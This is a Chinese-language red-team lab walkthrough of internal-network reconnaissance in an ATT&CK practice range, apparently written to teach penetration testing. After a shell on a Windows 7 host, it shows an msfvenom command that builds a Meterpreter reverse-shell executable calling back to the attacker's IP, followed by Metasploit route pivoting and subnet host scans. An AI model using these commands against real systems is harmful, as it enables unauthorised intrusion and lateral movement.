靶机练习 - ATT&CK红队实战靶场 - 2. 内网信息收集

 拿到win7的shell之后，执行下ipconfig，发现win7有两块网卡，外网ip为：192.168.174.135，内网ip为：192.168.52.143：

查看当前登录域及登录用户信息：net config Workstation

查看域成员：net view /domain:god。不知道为啥查看不了。。。

我们知道win7在一个名为god的域里，也知道了内网ip的网段，接下来找出该主机所在内网网段的其他存活主机。

1. 用msf生成木马传到win7上并执行该文件，得到msf的session：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.128 LPORT=4446 -f exe -o shell.exe

2. 配置静态路由：

run autoroute -s 192.168.52.0/24

3. 存活主机探测

试了一下，下面两种方法都可以

run auxiliary/scanner/netbios/nbname RHOSTS=192.168.52.0/24
run post/windows/gather/arp_scanner RHOSTS=192.168.52.0/24

找到两个存活主机：192.168.52.138(主机名为OWA)和192.168.52.141(GOD域上的主机名为ROOT-TVI862UBEH)

本文仅用于技术学习和交流，严禁用于非法用途，否则产生的一切后果自行承担。  

如需转载，请注明出处，这是对他人劳动成果的尊重。